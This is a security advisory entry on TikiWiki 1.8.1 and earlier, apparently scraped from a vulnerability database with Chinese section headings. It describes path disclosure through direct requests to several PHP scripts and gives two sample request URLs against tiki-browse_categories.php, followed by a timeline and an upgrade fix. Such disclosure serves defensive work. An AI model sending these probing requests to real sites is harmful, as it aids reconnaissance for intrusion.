[原文]Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allows remote attackers to gain sensitive information via a direct request to (1) banner_click.php, (2) categorize.php, (3) tiki-admin_include_directory.php, (4) tiki-directory_search.php, which reveal the web server path in an error message.
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=
TikiWiki banner_click.php Direct Request Path Disclosure
Remote / Network Access
Information Disclosure,
Input Manipulation
Loss of Confidentiality,
Loss of Integrity
Exploit Public
Vendor Verified
-
漏洞描述
TikiWiki contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker calls the "banner_click.php" script with abnormal parameters, which will disclose the physical path of the web server resulting in a loss of confidentiality.
-
时间线
2004-04-11
Unknow
2004-04-11
Unknow
-
解决方案
Upgrade to version 1.8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.